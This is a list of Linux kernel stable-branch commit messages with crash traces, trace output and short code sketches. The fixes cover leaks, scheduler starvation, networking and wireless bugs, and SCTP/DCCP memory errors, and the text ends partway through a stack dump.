Johan Hovold [Tue, 1 Nov 2016 10:38:18 +0000 (11:38 +0100)]
mfd: core: Fix device reference leak in mfd_clone_cell
commit
722f191080de641f023feaa7d5648caf377844f5 upstream.
Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().
Fixes:
a9bbba996302 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jaewon Kim [Fri, 22 Jan 2016 00:55:07 +0000 (16:55 -0800)]
ratelimit: fix bug in time interval by resetting right begin time
commit
c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.
rs->begin in ratelimit is set in two cases.
1) when rs->begin was not initialized
2) when rs->interval was passed
For case #2, the current ratelimit code sets begin to 0. This incurs
improper suppression. The begin value will be set in the next ratelimit
call by 1). Then the time interval check will always be false, and
rs->printed will not be initialized. Although enough time has passed,
ratelimit may return 0 if rs->printed is not less than rs->burst. To
reset the interval properly, begin should be jiffies rather than 0.
For example, with the code below:
static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
for (i = 1; i <= 10; i++) {
if (__ratelimit(&mylimit))
printk("ratelimit test count %d\n", i);
msleep(3000);
}
The test result with the current code shows suppression even though there is a 3-second sleep.
[ 78.391148] ratelimit test count 1
[ 81.295988] ratelimit test count 2
[ 87.315981] ratelimit test count 4
[ 93.336267] ratelimit test count 6
[ 99.356031] ratelimit test count 8
[ 105.376367] ratelimit test count 10
Signed-off-by: Jaewon Kim <jaewon31.kim@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
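A sketch of the corresponding change in ___ratelimit(), simplified and with locking omitted:
if (time_is_before_jiffies(rs->begin + rs->interval)) {
	if (rs->missed)
		printk(KERN_WARNING "%s: %d callbacks suppressed\n",
		       func, rs->missed);
	rs->begin   = jiffies;	/* was: rs->begin = 0; */
	rs->printed = 0;
	rs->missed  = 0;
}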
Ding Tianhong [Wed, 15 Jun 2016 07:27:36 +0000 (15:27 +0800)]
rcu: Fix soft lockup for rcu_nocb_kthread
commit
bedc1969150d480c462cdac320fa944b694a7162 upstream.
Carrying out the following steps results in a softlockup in the
RCU callback-offload (rcuo) kthreads:
1. Connect to ixgbevf, and set the speed to 10Gb/s.
2. Use ifconfig to bring the nic up and down repeatedly.
[ 317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
[ 368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15]
[ 368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[ 368.106005] task:
ffff88057dd8a220 ti:
ffff88057dd9c000 task.ti:
ffff88057dd9c000
[ 368.106005] RIP: 0010:[<
ffffffff81579e04>] [<
ffffffff81579e04>] fib_table_lookup+0x14/0x390
[ 368.106005] RSP: 0018:
ffff88061fc83ce8 EFLAGS:
00000286
[ 368.106005] RAX:
0000000000000001 RBX:
00000000020155c0 RCX:
0000000000000001
[ 368.106005] RDX:
ffff88061fc83d50 RSI:
ffff88061fc83d70 RDI:
ffff880036d11a00
[ 368.106005] RBP:
ffff88061fc83d08 R08:
0000000000000001 R09:
0000000000000000
[ 368.106005] R10:
ffff880036d11a00 R11:
ffffffff819e0900 R12:
ffff88061fc83c58
[ 368.106005] R13:
ffffffff816154dd R14:
ffff88061fc83d08 R15:
00000000020155c0
[ 368.106005] FS:
0000000000000000(0000) GS:
ffff88061fc80000(0000) knlGS:
0000000000000000
[ 368.106005] CS: 0010 DS: 0000 ES: 0000 CR0:
0000000080050033
[ 368.106005] CR2:
00007f8c2aee9c40 CR3:
000000057b222000 CR4:
00000000000407e0
[ 368.106005] DR0:
0000000000000000 DR1:
0000000000000000 DR2:
0000000000000000
[ 368.106005] DR3:
0000000000000000 DR6:
00000000ffff0ff0 DR7:
0000000000000400
[ 368.106005] Stack:
[ 368.106005]
00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00
[ 368.106005]
ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146
[ 368.106005]
ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0
[ 368.106005] Call Trace:
[ 368.106005] <IRQ>
[ 368.106005]
[ 368.106005] [<
ffffffff815349a6>] ip_route_input_noref+0x516/0xbd0
[ 368.106005] [<
ffffffff814ee146>] ? skb_release_data+0xd6/0x110
[ 368.106005] [<
ffffffff814ee20a>] ? kfree_skb+0x3a/0xa0
[ 368.106005] [<
ffffffff8153698f>] ip_rcv_finish+0x29f/0x350
[ 368.106005] [<
ffffffff81537034>] ip_rcv+0x234/0x380
[ 368.106005] [<
ffffffff814fd656>] __netif_receive_skb_core+0x676/0x870
[ 368.106005] [<
ffffffff814fd868>] __netif_receive_skb+0x18/0x60
[ 368.106005] [<
ffffffff814fe4de>] process_backlog+0xae/0x180
[ 368.106005] [<
ffffffff814fdcb2>] net_rx_action+0x152/0x240
[ 368.106005] [<
ffffffff81077b3f>] __do_softirq+0xef/0x280
[ 368.106005] [<
ffffffff8161619c>] call_softirq+0x1c/0x30
[ 368.106005] <EOI>
[ 368.106005]
[ 368.106005] [<
ffffffff81015d95>] do_softirq+0x65/0xa0
[ 368.106005] [<
ffffffff81077174>] local_bh_enable+0x94/0xa0
[ 368.106005] [<
ffffffff81114922>] rcu_nocb_kthread+0x232/0x370
[ 368.106005] [<
ffffffff81098250>] ? wake_up_bit+0x30/0x30
[ 368.106005] [<
ffffffff811146f0>] ? rcu_start_gp+0x40/0x40
[ 368.106005] [<
ffffffff8109728f>] kthread+0xcf/0xe0
[ 368.106005] [<
ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
[ 368.106005] [<
ffffffff816147d8>] ret_from_fork+0x58/0x90
[ 368.106005] [<
ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
==================================cut here==============================
It turns out that the rcuos callback-offload kthread is busy processing
a very large quantity of RCU callbacks, and it is not relinquishing the
CPU while doing so. This commit therefore adds a cond_resched_rcu_qs()
within the loop to allow other tasks to run.
[js] use only cond_resched() in 3.12
Signed-off-by: Ding Tianhong <dingtianhong@huawei.com>
[ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ]
Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Dhaval Giani <dhaval.giani@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Wed, 20 Jul 2016 22:45:05 +0000 (15:45 -0700)]
tools/vm/slabinfo: fix an unintentional printf
commit
2d6a4d64812bb12dda53704943b61a7496d02098 upstream.
The curly braces are missing here so we print stuff unintentionally.
Fixes:
9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Cc: Colin Ian King <colin.king@canonical.com>
Cc: Laura Abbott <labbott@fedoraproject.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Daniel Mentz [Fri, 28 Oct 2016 00:46:59 +0000 (17:46 -0700)]
lib/genalloc.c: start search from start of chunk
commit
62e931fac45b17c2a42549389879411572f75804 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
Fixes:
7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
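A sketch of the chunk loop in gen_pool_alloc() with the reset in place (simplified from the description above):
list_for_each_entry_rcu(chunk, &pool->chunks, next_chunk) {
	if (size > atomic_read(&chunk->avail))
		continue;

	start_bit = 0;	/* the fix: search from the start of each chunk */
	end_bit = chunk_size(chunk) >> order;
	start_bit = pool->algo(chunk->bits, end_bit, start_bit,
			       nbits, pool->data);
	if (start_bit >= end_bit)
		continue;
	/* a free range was found in this chunk; reserve it and return */
}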
Richard Weinberger [Wed, 9 Nov 2016 21:52:58 +0000 (22:52 +0100)]
drbd: Fix kernel_sendmsg() usage - potential NULL deref
commit
d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
Commit 57be5bd ("ip: convert tcp_sendmsg() to iov_iter primitives")
changes that, and exposes our long-standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=
2336150
[4] http://e2.howsolveproblem.com/i/
1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes:
b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Glauber Costa [Fri, 23 Sep 2016 00:59:59 +0000 (20:59 -0400)]
cfq: fix starvation of asynchronous writes
commit
3932a86b4b9d1f0b049d64d4591ce58ad18b44ec upstream.
While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.
The problem seems to happen because XFS may block on pending metadata updates
under certain circumstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):
ffffffffb90c57b1 finish_task_switch
ffffffffb97dffb5 schedule
ffffffffb97e310c schedule_timeout
ffffffffb97e1f12 __down
ffffffffb90ea821 down
ffffffffc046a9dc xfs_buf_lock
ffffffffc046abfb _xfs_buf_find
ffffffffc046ae4a xfs_buf_get_map
ffffffffc046babd xfs_buf_read_map
ffffffffc0499931 xfs_trans_read_buf_map
ffffffffc044a561 xfs_da_read_buf
ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
ffffffffc0452b90 xfs_dir2_leaf_lookup_int
ffffffffc0452e0f xfs_dir2_leaf_lookup
ffffffffc044d9d3 xfs_dir_lookup
ffffffffc047d1d9 xfs_lookup
ffffffffc0479e53 xfs_vn_lookup
ffffffffb925347a path_openat
ffffffffb9254a71 do_filp_open
ffffffffb9242a94 do_sys_open
ffffffffb9242b9e sys_open
ffffffffb97e42b2 entry_SYSCALL_64_fastpath
00007fb0698162ed [unknown]
Inspecting my run with blktrace, I can see that the xfsaild kthread exhibits very
high "Dispatch wait" times, in the dozens-of-seconds range, consistent with
the open() times I saw in that run.
Still from the blktrace output, we can, after searching a bit, identify the
request that wasn't dispatched:
8,0 11 152 81.092472813 804 A WM 141698288 + 8 <- (8,1) 141696240
8,0 11 153 81.092472889 804 Q WM 141698288 + 8 [xfsaild/sda1]
8,0 11 154 81.092473207 804 G WM 141698288 + 8 [xfsaild/sda1]
8,0 11 206 81.092496118 804 I WM 141698288 + 8 ( 22911) [xfsaild/sda1]
<==== 'I' means Inserted (into the IO scheduler) ===================================>
8,0 0 289372 96.718761435 0 D WM 141698288 + 8 (15626265317) [swapper/0]
<==== Only 15s later the CFQ scheduler dispatches the request ======================>
As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):
8,0 1 0 81.117912979 0 m N cfq1618SN / insert_request
8,0 1 0 81.117913419 0 m N cfq1618SN / add_to_rr
8,0 1 0 81.117914044 0 m N cfq1618SN / preempt
8,0 1 0 81.117914398 0 m N cfq767A / slice expired t=1
8,0 1 0 81.117914755 0 m N cfq767A / resid=40
8,0 1 0 81.117915340 0 m N / served: vt=1948520448 min_vt=1948520448
8,0 1 0 81.117915858 0 m N cfq767A / sl_used=1 disp=0 charge=0 iops=1 sect=0
where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.
The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.
Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.
Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.
When the queue itself tests cfq_may_dispatch() it can bail if it sees SYNC
requests in flight. An incoming request from another queue can also preempt it
in such a situation before we have the chance to execute anything (as seen in the
trace above).
This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired)
Care is taken during preempt to still allow rt requests to preempt us
regardless.
Testing my workload with this patch applied produces much better results.
From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:
Latency histogram of xfs_buf_lock acquisition (microseconds):
value |-------------------------------------------------- count
0 | 11
1 |@@@@ 161
2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1966
4 |@ 54
8 | 36
16 | 7
32 | 0
64 | 0
~
1024 | 0
2048 | 0
4096 | 1
8192 | 1
16384 | 2
32768 | 0
65536 | 0
131072 | 1
262144 | 0
524288 | 0
Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Willy Tarreau [Mon, 6 Feb 2017 07:59:06 +0000 (08:59 +0100)]
Revert "ipc/sem.c: optimize sem_lock()"
This reverts commit
901f6fedc5340d66e2ca67c70dfee926cb5a1ea0
(upstream commit
6d07b68ce16ae9535955ba2059dedba5309c3ca1).
As suggested in commit
5864a2fd3088db73d47942370d0f7210a807b9bc
(ipc/sem.c: fix complex_count vs. simple op race) since it introduces
a regression and the candidate fix requires too many changes for 3.10.
Cc: Manfred Spraul <manfred@colorfullife.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Michal Hocko [Thu, 1 Sep 2016 23:15:13 +0000 (16:15 -0700)]
kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd
commit
735f2770a770156100f534646158cb58cb8b2939 upstream.
Commit
fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted. Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).
The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):
: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls. This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping. This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.
The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for. It
seems that limiting the scope of the check to core dumping should work
for the SIGSEGV issue described above.
[Changelog partly based on Andreas' description]
Fixes:
fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Tested-by: William Preston <wpreston@suse.com>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Roland McGrath <roland@hack.frob.com>
Cc: Andreas Schwab <schwab@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steven Rostedt (Red Hat) [Sat, 24 Sep 2016 02:57:13 +0000 (22:57 -0400)]
tracing: Move mutex to protect against resetting of seq data
commit
1245800c0f96eb6ebb368593e251d66c01e61022 upstream.
The iter->seq can be reset outside the protection of the mutex. So can
reading of user data. Move the mutex up to the beginning of the function.
Fixes:
d7350c3f45694 ("tracing/core: make the read callbacks reentrants")
Reported-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Oliver Neukum [Wed, 17 Aug 2016 13:51:55 +0000 (15:51 +0200)]
kaweth: fix firmware download
commit
60bcabd080f53561efa9288be45c128feda1a8bb upstream.
This fixes the oops discovered by the Umap2 project and Alan Stern.
The intf member needs to be set before the firmware is downloaded.
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jeremy Linton [Thu, 17 Nov 2016 15:14:25 +0000 (09:14 -0600)]
net: sky2: Fix shutdown crash
commit
06ba3b2133dc203e1e9bc36cee7f0839b79a9e8b upstream.
The sky2 frequently crashes during machine shutdown with:
sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50
This is caused by the sky2 driver being called after it has been shut down.
A previous thread about this can be found here:
https://lkml.org/lkml/2016/4/12/410
An alternative fix is to assure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what the
bnx2/tg3/xgene and maybe others are doing to assure that the driver
isn't being called following _shutdown().
Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eli Cooper [Thu, 1 Dec 2016 02:05:10 +0000 (10:05 +0800)]
ipv4: Set skb->protocol properly for local output
commit
f4180439109aa720774baafdd798b3234ab1a0d2 upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
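The one-line idea, sketched in a simplified local-output helper (the exact hook point in a 3.10-era tree may differ):
int err;

skb->protocol = htons(ETH_P_IP);	/* the added assignment */

err = __ip_local_out(skb);
if (likely(err == 1))
	err = dst_output(skb);
return err;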
Brian Norris [Wed, 9 Nov 2016 02:28:24 +0000 (18:28 -0800)]
mwifiex: printk() overflow with 32-byte SSIDs
commit
fcd2042e8d36cf644bd2d69c26378d17158b17df upstream.
SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.
This can be easily noticed by connecting to a network with a 32-octet
SSID:
[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid xx:xx:xx:xx:xx:xx
Fixes:
5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
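One way to cap the printed length, as a sketch (the print helper and field names here are assumptions about the driver):
dev_dbg(adapter->dev, "info: trying to associate to '%.*s' bssid %pM\n",
	(int)bss_desc->ssid.ssid_len, bss_desc->ssid.ssid,
	bss_desc->mac_address);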
Johannes Berg [Tue, 15 Nov 2016 11:05:11 +0000 (12:05 +0100)]
cfg80211: limit scan results cache size
commit
9853a55ef1bb66d7411136046060bbfb69c714fa upstream.
It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.
Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johannes Berg [Wed, 5 Oct 2016 08:14:42 +0000 (10:14 +0200)]
mac80211: discard multicast and 4-addr A-MSDUs
commit
ea720935cf6686f72def9d322298bf7e9bd53377 upstream.
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
* drop A-MSDUs with a multicast A1 (RA), as required by the
spec in 9.11 (802.11-2012 version)
* drop A-MSDUs with a 4-addr header, since the fourth address
can't actually be useful for them; unless 4-address frame
format is actually requested, even though the fourth address
is still not useful in this case, but ignored
Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Felix Fietkau [Tue, 2 Aug 2016 09:13:41 +0000 (11:13 +0200)]
mac80211: fix purging multicast PS buffer queue
commit
6b07d9ca9b5363dda959b9582a3fc9c0b89ef3b5 upstream.
The code currently assumes that buffered multicast PS frames don't have
a pending ACK frame for tx status reporting.
However, hostapd sends a broadcast deauth frame on teardown for which tx
status is requested. This can lead to the "Have pending ack frames"
warning on module reload.
Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.
Signed-off-by: Felix Fietkau <nbd@nbd.name>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stephen Suryaputra Lin [Thu, 10 Nov 2016 16:16:15 +0000 (11:16 -0500)]
ipv4: use new_gw for redirect neigh lookup
commit
969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit
5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never get resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
Fixes:
5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
WANG Cong [Thu, 25 Sep 2014 00:07:53 +0000 (17:07 -0700)]
neigh: check error pointer instead of NULL for ipv4_neigh_lookup()
commit
2c1a4311b61072afe2309d4152a7993e92caa41c upstream.
Fixes: commit
f187bc6efb7250afee0e2009b6106 ("ipv4: No need to set generic neighbour pointer")
Cc: David S. Miller <davem@davemloft.net>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Marcelo Ricardo Leitner [Thu, 3 Nov 2016 19:03:41 +0000 (17:03 -0200)]
sctp: assign assoc_id earlier in __sctp_connect
commit
7233bc84a3aeda835d334499dc00448373caf5c0 upstream.
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread releases it. But Andrey
Konovalov and Dmitry Vyukov reported a use-after-free in such a
situation.
Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.
The fix is, instead of doing the read after waiting for the connect, to do
it before, and so avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 3 Nov 2016 02:00:40 +0000 (19:00 -0700)]
dccp: fix out of bound access in dccp_v4_err()
commit
6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow us to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3).
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 3 Nov 2016 01:04:24 +0000 (18:04 -0700)]
dccp: do not send reset to already closed sockets
commit
346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.
Andrey reported following warning while fuzzing with syzkaller
WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...
CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
